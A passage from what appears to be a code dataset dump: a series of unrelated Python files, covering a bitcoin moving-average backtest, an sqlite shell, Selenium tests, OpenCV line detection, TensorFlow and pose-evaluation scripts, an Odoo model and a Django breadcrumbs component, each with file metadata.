예제/#111~#119.py","file_name":"#111~#119.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"342593574","text":"from datetime import date, datetime, timedelta\nfrom rates_data_manager import get_and_manage_rates_data\nimport matplotlib.pyplot as plt\nfrom rates_data_processing import *\n\ndate_start = date(2019, 1, 1)\ndate_end = date(2020, 7, 1)\n# date_end = date.today()-timedelta(1)\nassets = \"BTC/EUR\"\n\nrates = get_and_manage_rates_data(assets, date_start, date_end)\nprint(\"nb rates:\", len(rates))\n\nma_intervals = [10, 50]\nma_list = []\n\nfor interval in ma_intervals:\n ma = compute_moving_average_for_rates_data(rates, interval)\n ma_list.append((ma, interval))\n\nbuy_and_sell_points = compute_buy_and_sell_points_from_ma(ma_list[0][0], ma_list[1][0], 1)\n\n\ninitial_wallet = 1000\nfinal_wallet = compute_buy_and_sell_gains(initial_wallet, rates, buy_and_sell_points)\n# Afficher date debut/fin\n# Afficher le 
portefeuille debut / fin\nprint(\"Date de début:\", date_start)\nprint(\"Date de fin:\", date_end)\nprint(\"Portefeuille de début:\", initial_wallet)\nprint(\"Portefeuille de fin:\", round(final_wallet))\n\n\n\n# [(..adverages.., interval), (..adverages.., interval), (..adverages.., interval)]\n# ma20 = compute_moving_average_for_rates_data(rates, 20)\n# ma100 = compute_moving_average_for_rates_data(rates, 100)\n\n# rates <- date / value\n'''\nrates_dates = [datetime.strptime(r[\"date\"], \"%Y-%m-%d\") for r in rates]\nrates_values = [r[\"value\"] for r in rates]\nplt.ylabel(assets)\nplt.plot(rates_dates, rates_values) # <--- valeurs\n\nfor ma_item in ma_list:\n ma_values = [r[\"value\"] for r in ma_item[0]]\n plt.plot(rates_dates, ma_values, label=\"MA\" + str(ma_item[1]))\n\n# r y\n# plt.axvline(x=date(2020, 5, 1), color='y')\n# buy_and_sell_points\n# [0] date_str\n# [1] true/false\n# plt.axvline(x=date(2020, 5, 1), color='y')\nfor point in buy_and_sell_points:\n date_obj = datetime.strptime(point[0], \"%Y-%m-%d\")\n plt.axvline(x=date_obj, color='r' if point[1] else 'y')\n\nplt.legend()\nplt.show()\n\n'''","sub_path":"bitcoin_analyser_v3_ressources/1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"216574998","text":"# Jordan Kadish\n# 27/10/2017\n# sqlite python database creation script\nimport sqlite3 as db\n\ndbName = input(\"enter a database name (\\\"test.db\\\")\\n\")\ntry:\n # connect to an existing database\n # or create a new one with the name taken from input\n connect = db.connect(dbName)\n cursor = connect.cursor()\nexcept Exception as e:\n print(e)\n\ncommand = input(\"Enter SQL commands, or type \\\"end\\\" to exit\\n\")\nwhile not (command == \"end\"):\n try:\n cursor.execute(command)\n response = cursor.fetchall()\n for row in response:\n print(row)\n except Exception as e:\n print(e)\n command = input()\n","sub_path":"sqlite3prog.py","file_name":"sqlite3prog.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"532498953","text":"name = \"ptex\"\n\nversion = \"2.1.28\"\n\nauthors = [\n 'Walt Disney Animation Studios'\n]\n\ndescription = \\\n '''\n Per-Face Texture Mapping for Production Rendering.\n '''\n\nbuild_requires = [\n 'gcc-4.8.2+'\n]\n\nvariants = [\n [\"platform-linux\", \"arch-x86_64\", \"os-CentOS-7\"]\n]\n\nuuid = \"ptex\"\n\ndef commands():\n env.PATH.append(\"{root}/bin\")\n env.LD_LIBRARY_PATH.append('{root}/lib64')\n\n if building:\n env.CPATH.append('{root}/include')\n env.LIBRARY_PATH.append('{root}/lib64')\n\n","sub_path":"ptex/2.1.28/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"466686774","text":"from time import sleep\nimport unittest\nfrom nose.plugins.attrib import attr\nfrom framework.base_test import setup_driver, teardown_driver\nfrom pages.allsubjectspage.all_subjects_list_page import AllSubjectsListPage\nfrom framework.utils.common_utils import by_id, random_string\nfrom pages.allsubjectspage.subjects_page import SubjectsPage\nfrom pages.loginpage.login_page import LoginPage\nfrom testdata.test_data import DATA_WINNER_LOGIN_PAGE, url\nfrom tests.allsubjectstests.all_subjects_data import SUBJECT_TYPE, SUBJECT_TYPE_WHITE_SPACES, ERROR_MSG_INVALID_ENTRY, SUBJECT_TYPE_SPL_CHARS, 
SUBJECT_TYPE_BLANK, ERROR_MSG_EMPTY_ENTRY\nfrom tests.logintests.login_data import VALID_CREDENTIALS\n\n\n@attr('suit_1')\nclass TestSubjectsPage(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.driver = setup_driver()\n cls.login_with(VALID_CREDENTIALS)\n\n @classmethod\n def login_with(cls, credential):\n cls.driver.go_to(DATA_WINNER_LOGIN_PAGE)\n LoginPage(cls.driver).login_with(credential)\n\n @classmethod\n def tearDownClass(cls):\n teardown_driver(cls.driver)\n\n def check_pagination_size(self, subjects_page, size):\n # +1 for the select all hidden row in the beginning of the table\n self.assertTrue(size+1 >= subjects_page.number_of_rows())\n self.assertEqual(size , subjects_page.selected_page_size())\n\n\n def add_subject_type(self, entity_type):\n all_subjects_page = SubjectsPage(self.driver)\n all_subjects_page.click_add_a_subject_type_link()\n all_subjects_page.add_entity_type_with(entity_type)\n\n\n @attr('functional_test')\n def test_all_subjects_page(self):\n self.driver.go_to(url(\"/entity/subjects/clinic/\"))\n subjects_page = AllSubjectsListPage(self.driver)\n self.check_pagination_size(subjects_page, 25)\n\n subjects_page.set_page_size(10)\n self.check_pagination_size(subjects_page, 10)\n\n subjects_page.search(\"tes\")\n\n self.check_pagination_size(subjects_page, 10)\n\n sleep(1)\n for row in subjects_page.rows()[1:]:\n self.assertIn(\"tes\", row.text.lower())\n\n\n @attr('functional_test')\n def test_add_duplicate_subjectType(self):\n self.driver.go_to(url(\"/entity/subjects/\"))\n subject_type_name = SUBJECT_TYPE + random_string(3)\n self.add_subject_type(subject_type_name)\n self.validate_subject_type(subject_type_name)\n self.add_subject_type(subject_type_name)\n\n def validate_error_messages(self,subject_type_name):\n error_msg = self.driver.find(by_id(\"type_message\")).text\n self.assertEquals(error_msg, subject_type_name)\n\n @attr('functional_test')\n def test_add_invalid_subjectType(self):\n self.driver.go_to(url(\"/entity/subjects/\"))\n self.add_subject_type(SUBJECT_TYPE_WHITE_SPACES)\n self.validate_error_messages(ERROR_MSG_INVALID_ENTRY)\n self.driver.find(by_id(\"cancel_add_type\")).click()\n self.add_subject_type(SUBJECT_TYPE_SPL_CHARS)\n self.validate_error_messages(ERROR_MSG_INVALID_ENTRY)\n self.driver.find(by_id(\"cancel_add_type\")).click()\n self.add_subject_type(SUBJECT_TYPE_BLANK)\n self.validate_error_messages(ERROR_MSG_EMPTY_ENTRY)\n\n\n def validate_subject_type(self, subject_type):\n element = self.driver.find_element_by_link_text(subject_type).text\n self.assertEquals(element.lower() , subject_type.lower())\n\n\n","sub_path":"func_tests/tests/allsubjectstests/all_subjects_tests.py","file_name":"all_subjects_tests.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"613237336","text":"import cv2\nimport numpy as np\nimg = cv2.imread('image/4.png')\n#cv2.imshow('img',img)\nimg_old = img.copy()\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n#cv2.imshow('gray', img)\ngblur = cv2.GaussianBlur(img, (5, 5), 0)\n#cv2.imshow('guass', gblur)\ncanny = cv2.Canny(gblur, 150, 380)\ncv2.imshow('car-canny', canny)\n\n\n\n\nlines = cv2.HoughLinesP(canny,1,np.pi/90,30,minLineLength=60,maxLineGap=65)\n\nlines1 = lines[:,0,:]#提取为为二维\nfor x1,y1,x2,y2 in lines1[:]:\n cv2.line(img_old,(x1,y1),(x2,y2),(0,0,255),1)\n\n#cv2.imshow(\"after drawContour\", canny);\ncv2.imshow(\"source img\", img_old)\ncv2.moveWindow(\"source 
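cv2.HoughLinesP in the edge-detection record above returns None when no segment clears the vote threshold, so `lines[:,0,:]` raises a TypeError on images without strong lines. A guarded version of the same detect-and-draw step, run on a synthetic image so the sketch is standalone:

import cv2
import numpy as np

img = np.zeros((200, 200, 3), np.uint8)
cv2.line(img, (20, 20), (180, 180), (255, 255, 255), 2)   # synthetic test line

gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
canny = cv2.Canny(cv2.GaussianBlur(gray, (5, 5), 0), 150, 380)

lines = cv2.HoughLinesP(canny, 1, np.pi / 90, 30, minLineLength=60, maxLineGap=65)
if lines is not None:                      # None means nothing detected
    for x1, y1, x2, y2 in lines[:, 0, :]:  # drop the singleton middle axis
        cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 1)
else:
    print("no line segments detected")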
img\",1000,100)\ncv2.waitKey(0)","sub_path":"hs/cvFeature/bianyuan2.py","file_name":"bianyuan2.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"442403558","text":"#m = loD('data/segnet/image_list2.pkl')\n\nchannel_list = []\nfor n in m:\n rgb_target = n[2]\n channels = zeros((shape(rgb_target)[0],shape(rgb_target)[1],6),np.uint8)\n for x in range(shape(rgb_target)[0]):\n for y in range(shape(rgb_target)[1]):\n c = list(rgb_target[x,y,:])\n if c == [255,0,0]:\n channels[x,y,:] = [1,0,0,0,0,0] # 0\n elif c == [0,255,0]:\n channels[x,y,:] = [0,1,0,0,0,0] # 1\n elif c == [0,0,255]:\n channels[x,y,:] = [0,0,1,0,0,0] # 2 \n elif c == [0,255,255]:\n channels[x,y,:] = [0,0,0,1,0,0] # 3\n elif c == [127,127,127]:\n channels[x,y,:] = [0,0,0,0,1,0] # 4\n elif c == [0,0,0]:\n channels[x,y,:] = [0,0,0,0,0,1] # 5\n else:\n assert False\n if False:\n mi(rgb_target,100)\n for i in range(6):\n mi(channels[:,:,i],i)\n spause()\n raw_enter()\n channel_list.append(na(channels))\n\n\nfrom utilz.vis import *\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\n\n\nclass Net(nn.Module):\n def __init__(_):\n super().__init__()\n _.first_time = True\n _.conv0 = nn.Conv2d(3, 64, kernel_size=1, stride=1)\n _.conv1 = nn.Conv2d(64, 64, kernel_size=1, stride=1)\n _.conv2 = nn.Conv2d(64, 6, kernel_size=1, stride=1)\n _.relu = nn.ReLU(inplace=True)\n def forward(_,x):\n a = [x]\n a.append( _.conv0(a[-1]) )\n a.append( _.relu(a[-1]) )\n a.append( _.conv1(a[-1]) )\n a.append( _.relu(a[-1]) )\n a.append( _.conv2(a[-1]) )\n #a.append( _.relu(a[-1]) )\n if _.first_time:\n _.first_time = False\n for b in a:\n print(b.size())\n return a[-1]\n\n\nnet = Net()\ncriterion = nn.MSELoss()\noptimizer = optim.Adam(net.parameters(), 0.001 )\ns = 0.001\nlosses = []\nsmooth_loss = []\ntimer = Timer(6)\nwhile True:\n indx = rndint(60)\n input_ = m[indx][1]\n input_ = na([input_.transpose(2,0,1)]) \n target = channel_list[indx]\n target = na([target.transpose(2,0,1)])\n input_ = torch.from_numpy(input_).float()\n target = torch.from_numpy(target)\n\n optimizer.zero_grad()\n output = net(input_)\n loss = criterion(torch.flatten(output,1),torch.flatten(target.float(),1))\n loss.backward()\n torch.nn.utils.clip_grad_norm(net.parameters(), 1.0)\n losses.append(loss.item())\n optimizer.step()\n if timer.rcheck():\n for i in range(6):\n mi(output.detach().numpy()[0,:].transpose(1,2,0)[:,:,i],i)\n spause()\n figure('losses')\n clf()\n smooth_loss.append(sum(na(losses)/len(losses)))\n plot(smooth_loss)\n losses = []\n spause()\n\n\n\n\n\n\n\n\ndef rgb_to_channels(rgb):\n channels = zeros((shape(rgb)[0],shape(rgb)[1],6),np.uint8)\n for x in range(shape(rgb)[0]):\n for y in range(shape(rgb)[1]):\n c = list(rgb[x,y,:])\n if c == [255,0,0]:\n channels[x,y,:] = [1,0,0,0,0,0] # 0\n elif c == [0,255,0]:\n channels[x,y,:] = [0,1,0,0,0,0] # 1\n elif c == [0,0,255]:\n channels[x,y,:] = [0,0,1,0,0,0] # 2 \n elif c == [0,255,255]:\n channels[x,y,:] = [0,0,0,1,0,0] # 3\n elif c == [127,127,127]:\n channels[x,y,:] = [0,0,0,0,1,0] # 4\n elif c == [0,0,0]:\n channels[x,y,:] = [0,0,0,0,0,1] # 5\n else:\n assert False\n return channels\n\nf=h5r(opjD('dep_seg_det_data_with_flip/train_dep_seg_det_data_with_flip_bed_21.1643903997.h5py'))\nfor j in range(60,120,2):\n a=rgb_to_channels(f['seg'][j])\n mi(f['seg'][j],10);spause()\n for i in range(6):\n 
mi(a[:,:,i],i)\n spause()\n raw_enter()\n\n","sub_path":"V/scale_out_data/Prepare_scale_out/v9/colors_to_channels.py","file_name":"colors_to_channels.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"224357172","text":"import numpy as np\r\nimport Image as im #http://www.pythonware.com/products/pil/index.htm\r\nimg = im.open('C:\\\\Users\\\\Arvind\\\\Desktop\\\\bear2rescaled.jpg')\r\nflower = np.asarray(img)\r\nprint(flower.shape)\r\nv=flower.reshape(flower.shape[0]*flower.shape[1], flower.shape[2])\r\n#arr=['LBP0.00','LBP1.00','LBP1.50','LBP2.00','LBP2.50','LBP5.00']\r\narr=['TRBP0.00','TRBP1.00','TRBP1.50','TRBP2.00','TRBP2.50','TRBP5.00']\r\nfor arrname in arr:\r\n print(arrname)\r\n components=np.loadtxt('C:\\\\Users\\\\Arvind\\\\Desktop\\\\'+arrname+'.txt', dtype=int)\r\n components = components-1\r\n #set the component with the higher prob for the pixel at (0,0) to be 0\r\n v2 = v.copy()\r\n v2[components==0]=0\r\n flower2 = v2.reshape(flower.shape)\r\n resultImage = im.fromarray(flower2)\r\n resultImage.save('C:\\\\Users\\\\Arvind\\\\Desktop\\\\'+arrname+'_1.jpg')\r\n v3 = v.copy()\r\n v3[components==1]=0\r\n flower3 = v3.reshape(flower.shape)\r\n resultImage2 = im.fromarray(flower3)\r\n resultImage2.save('C:\\\\Users\\\\Arvind\\\\Desktop\\\\'+arrname+'_0.jpg')\r\n","sub_path":"ViewSegmentedImage.py","file_name":"ViewSegmentedImage.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"531035213","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport os\n\nos.chdir('../../data')\n\ntrain = pd.read_csv('train2.csv', header=None)\ntrain_X = train.iloc[1:, :1022]\ntrain_Y = train.iloc[1:, 1022]\ntest = pd.read_csv('test2.csv', header=None)\ntest_X = test.iloc[1:, :1022]\ntest_Y = test.iloc[1:, 1022]\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef conv1d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_14(x):\n return tf.nn.max_pool(x, ksize=[1, 1, 14, 1],\n strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef compute_loss(loss, v_xs, v_ys):\n return sess.run(loss, feed_dict={x: v_xs, y_: v_ys, keep_prob: 1})\n\n\nx = tf.placeholder(tf.float32, [None, 1022])\ny_ = tf.placeholder(tf.float32, [None, 1])\n\nW_conv1 = weight_variable([1, 7, 1, 10])\nb_conv1 = bias_variable([10])\n\nx_image = tf.reshape(x, [-1, 1, 1022, 1])\n\nh_conv1 = tf.nn.relu(conv1d(x_image, W_conv1) + b_conv1)\n\nW_conv2 = weight_variable([1, 2, 10, 5])\nb_conv2 = bias_variable([5])\n\nh_conv2 = tf.nn.relu(conv1d(h_conv1, W_conv2) + b_conv2)\nh_pool2 = max_pool_14(h_conv2)\n\nW_fc1 = weight_variable([73 * 5 * 14, 511])\nb_fc1 = bias_variable([511])\n\nh_pool2_flat = tf.reshape(h_pool2, [-1, 73 * 5 * 14])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n'''\nW_fc1 = weight_variable([73*5, 511])\nb_fc1 = bias_variable([511])\n\nh_pool2_flat = tf.reshape(h_pool2, [-1, 73*5])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n'''\n\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\nW_fc2 = weight_variable([511, 1])\nb_fc2 = bias_variable([1])\n\ny_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\nprediction 
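ViewSegmentedImage.py above uses the pre-Pillow `import Image as im` form, which fails on any current install. The same mask-and-save flow with today's Pillow import; the file names here are shortened stand-ins for the record's absolute Windows paths:

import numpy as np
from PIL import Image   # modern replacement for "import Image as im"

img = np.asarray(Image.open("bear2rescaled.jpg"))
flat = img.reshape(-1, img.shape[2])

components = np.loadtxt("TRBP0.00.txt", dtype=int) - 1   # labels start at 1

masked = flat.copy()                 # asarray can return a read-only view
masked[components == 0] = 0          # black out pixels of component 0
Image.fromarray(masked.reshape(img.shape)).save("TRBP0.00_1.jpg")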
= y_conv\n\nloss = tf.reduce_mean(tf.reduce_sum(tf.square(y_ - prediction), reduction_indices=[1]))\ntrain_step = tf.train.AdamOptimizer(1e-4).minimize(loss)\ntrain_Y = np.reshape(train_Y, [train_Y.shape[0], 1])\ntest_Y = np.reshape(test_Y, [test_Y.shape[0], 1])\n\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\nfor i in range(0, 10000):\n sess.run(train_step, feed_dict={x: train_X, y_: train_Y, keep_prob: 0.8})\n if i % 100 == 0:\n print(compute_loss(loss, test_X, test_Y))\n plt.scatter(test_Y, sess.run(prediction, feed_dict={x: test_X, y_: test_Y, keep_prob: 1}))\n plt.savefig('{0}'.format(i))\n plt.close()\n\n'''\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\nfor i in range(20000):\n if i%100 == 0:\n train_accuracy = compute_accuracy(train_X,train_Y)\n print(\"step %d, training accuracy %g\"%(i, train_accuracy))\n train_step.run(feed_dict={x: train_X, y_: train_Y, keep_prob: 0.8})\n\nprint(\"test accuracy %g\"%compute_accuracy(test_X, test_Y))\n\n'''\n","sub_path":"DrugDesign_2/Models/CNN/CNN_I.py","file_name":"CNN_I.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"41138933","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib as mpl\n\naru_water = pd.read_csv('/Users/mistral/Documents/CUBoulder/Science/Sulzer/data/Other_ERA/Aru_5500m_apr_jul_wateravailability.csv')\naru_melt = pd.read_csv('/Users/mistral/Documents/CUBoulder/Science/Sulzer/data/Other_ERA/Aru_5500m_apr_jul_melt.csv')\nfc_water = pd.read_csv('/Users/mistral/Documents/CUBoulder/Science/Sulzer/data/meteo/FC_water_apr_jul_2200m.csv')\nfc_melt = pd.read_csv('/Users/mistral/Documents/CUBoulder/Science/Sulzer/data/meteo/FC_melt_apr_jul_2200m.csv')\n\nplt.style.use('ggplot')\nfig,ax = plt.subplots(figsize = (16,10))\nmpl.rcParams['lines.linewidth'] = 1.8\nmpl.rcParams['lines.markersize'] = 8.5\nax.plot(aru_water.year, aru_water.total_water, '.-', color = 'skyblue', label = 'Aru (total)')\nax.plot(aru_melt.year, aru_melt['melt'],'.:', color = 'skyblue', label = 'Aru (from melt)')\nax.plot(fc_water.year, fc_water.total_water, '.-', color = 'grey', label = 'Flat Creek (total)')\nax.plot(fc_melt.year, fc_melt['melt'],'.:', color = 'grey', label = 'Flat Creek (from melt)')\nplt.plot([2013], [510.55928471], 'o', color = 'black', markersize = 5)\nplt.plot([2015], [285.17040509], 'o', color = 'black', markersize = 5)\nplt.plot([2016], [533.367536], 'o', color = 'steelblue', markersize = 5)\nax.tick_params('both', labelsize = 18)\nplt.xlabel('Year', fontsize = 20)\nplt.ylabel('Water availability [mm]', fontsize = 20)\nax.legend(fontsize = 16, loc = 2)\nplt.ylim([0,580])\nplt.title('Pre-detachment total liquid water availability', fontsize = 22)\nplt.text(2016.1,540, '2016', fontsize = 16, color = 'steelblue', fontweight = 'bold')\nplt.text(2015.1,290, '2015', fontsize = 16, color = 'black', fontweight = 'bold')\nplt.text(2013.2,515, '2013', fontsize = 16, color = 'black', fontweight = 'bold')\nplt.show()\n#plt.savefig('FC_and_Aru_water_availability.png')\n","sub_path":"FC_GeologyFigure4.py","file_name":"FC_GeologyFigure4.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"209201301","text":"import os, torch\nfrom evaluate.coco_eval import run_eval\nfrom network.rtpose_vgg import get_model, use_vgg\nfrom xinshuo_io import mkdir_if_missing\n# 
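CNN_I.py above is TensorFlow 1.x graph code (placeholders, Session, truncated_normal) and will not run on a TF 2.x install as written. The usual bridge is the compat.v1 module with v2 behaviour disabled; a minimal self-contained sketch, with a stand-in op where the record's graph would go:

import numpy as np
import tensorflow.compat.v1 as tf

tf.disable_v2_behavior()             # restores placeholders, Session, etc.

x = tf.placeholder(tf.float32, [None, 1022])
y = tf.reduce_mean(tf.square(x))     # stand-in for the record's network

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    print(sess.run(y, feed_dict={x: np.ones((2, 1022), np.float32)}))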
from torch import load\n\n# test_split = 'test2017'\ntest_split = 'val2014'\nimage_list_file = './evaluate/image_info_val2014_1k.txt'\nroot_dir = '/media/xinshuo/Data/Datasets/coco/'\nvis_dir = os.path.join(root_dir, test_split+'_vis'); mkdir_if_missing(vis_dir)\n\n\nmodel_dir = '/media/xinshuo/Data/models/2dcpm_pytorch/pretrained'\n\n#Notice, if you using the \nwith torch.autograd.no_grad():\n # this path is with respect to the root of the project\n weight_name = os.path.join(model_dir, 'pose_model_scratch.pth')\n state_dict = torch.load(weight_name)\n model = get_model(trunk='vgg19')\n \n model = torch.nn.DataParallel(model).cuda()\n model.load_state_dict(state_dict)\n model.eval()\n model.float()\n model = model.cuda()\n \n # The choice of image preprocessing include: 'rtpose', 'inception', 'vgg' and 'ssd'.\n # If you use the converted model from caffe, it is 'rtpose' preprocess, the model trained in \n # this repo used 'vgg' preprocess\n run_eval(coco_root=root_dir, test_split=test_split, vis_dir=vis_dir,\n image_list_txt=image_list_file, \n model=model, preprocess='vgg')\n\n\n\n# val 2014 1k, with flipping average, with multi-scale search, using offline from scratch trained model from repo\n# Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.614\n# Average Precision (AP) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.840 \n# Average Precision (AP) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.671\n# Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.624\n# Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.608\n# Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.656 \n# Average Recall (AR) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.852 \n# Average Recall (AR) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.704 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.635 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.697\n\n\n# val 2014 1k, with flipping average, using offline from scratch trained model from repo\n# Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.524\n# Average Precision (AP) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.782 \n# Average Precision (AP) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.548 \n# Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.482 \n# Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.610 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.574\n# Average Recall (AR) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.799 \n# Average Recall (AR) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.598 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.496 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.715\n\n\n# val 2014 1k, with multi-scale search, using offline from scratch trained model from repo\n# Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.599 \n# Average Precision (AP) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.830\n# Average Precision (AP) @[ IoU=0.75 | area= all | maxDets= 20 ] = 0.651\n# Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.609 \n# Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.592 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 20 ] = 0.640 \n# Average Recall (AR) @[ IoU=0.50 | area= all | maxDets= 20 ] = 0.845 \n# Average Recall (AR) @[ IoU=0.75 | area= all | maxDets= 20 ] = 
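The evaluation record above wraps loading in torch.autograd.no_grad(); the shorter public alias is torch.no_grad(), and it is only needed around inference. The record also wraps the model in DataParallel before load_state_dict, which suggests the checkpoint keys carry the "module." prefix; stripping that prefix lets a plain model load the same weights. A self-contained sketch with a toy module standing in for the repo's get_model():

import torch
import torch.nn as nn

# Toy stand-in for get_model(); any module with matching keys works.
model = nn.Linear(4, 2)

# state_dicts saved from nn.DataParallel prefix every key with "module.".
saved = nn.DataParallel(nn.Linear(4, 2)).state_dict()
clean = {k.replace("module.", "", 1): v for k, v in saved.items()}
model.load_state_dict(clean)         # plain model now accepts the weights

model.eval()
with torch.no_grad():                # public alias of torch.autograd.no_grad
    out = model(torch.zeros(1, 4))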
0.685\n# Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets= 20 ] = 0.619 \n# Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets= 20 ] = 0.684 ","sub_path":"evaluate/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"265747492","text":"# -*-coding: utf-8 -*-\nfrom odoo import models, fields, api, exceptions\n\n\nclass PartnerInherit(models.Model):\n _inherit = 'res.partner'\n\n max_amount = fields.Float(string='Max Amount', digit=(16, 2))\n discount_value = fields.Float(string='Discount (%)', digit=(16, 2))\n is_competitor = fields.Boolean(default=False, string='Is a Competitor')\n district_id = fields.Many2one('res.country.district', string='District')\n count_contract = fields.Integer(computed='_compute_count_contract')\n count_project = fields.Integer(computed='_compute_count_project')\n\n def _compute_count_contract(self):\n for rec in self:\n rec.count_contract = self.env['srdc.contract'].search_count([('partner_id', '=', rec.id)])\n\n def _compute_count_project(self):\n for rec in self:\n rec.count_project = self.env['project.project'].search_count([('partner_id', '=', rec.id)])\n","sub_path":"srdc_sale/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"268307475","text":"# -*- coding: utf-8 -*-\nfrom djangoplus.ui import Component\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.http.request import QueryDict\n\n\nclass Breadcrumbs(Component):\n def __init__(self, request, view_title):\n super(Breadcrumbs, self).__init__(request)\n self.referrer = None\n if view_title:\n path = request.get_full_path()\n is_popup = 'popup=1' in path\n is_csv = 'export=csv' in path\n is_static = path.startswith('/static/')\n is_media = path.startswith('/media/')\n\n if not is_popup and not is_csv and not is_static and not is_media:\n if 'stack' not in request.session:\n request.session['stack'] = []\n stack = request.session['stack']\n\n count = 0\n index = len(stack)\n while index:\n index -= 1\n title, url = stack[index]\n if not '?' in url:\n url = '%s?' % url\n urlpath, querystring = url.split('?')\n if view_title == title:#and QueryDict(querystring) == request.GET\n count = len(stack) - index\n break\n\n while count:\n stack.pop()\n count -= 1\n\n if stack:\n title, url = stack[-1]\n request.REFERRER = url\n else:\n request.REFERRER = path\n\n stack.append((view_title, path))\n\n request.session.save()\n self.referrer = len(stack) > 1 and stack[-2][1]\n\n def __unicode__(self):\n return self.render('breadcrumbs.html')\n\n\ndef httprr(request, url, message='', error=False):\n if message:\n if error:\n messages.error(request, message, extra_tags='danger')\n else:\n messages.success(request, message, extra_tags='success')\n\n if 'popup' in request.GET:\n return HttpResponse(url)\n\n if url in ('.', '..'):\n back = abs(url == '..' 
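In the Odoo model above, fields.Integer(computed='...') does nothing: the keyword Odoo reads is compute=, so count_contract and count_project are never calculated and the typo is silently ignored. The corrected declarations:

from odoo import models, fields

class PartnerInherit(models.Model):
    _inherit = 'res.partner'

    # `compute=` is the keyword Odoo recognises; `computed=` was a no-op.
    count_contract = fields.Integer(compute='_compute_count_contract')
    count_project = fields.Integer(compute='_compute_count_project')

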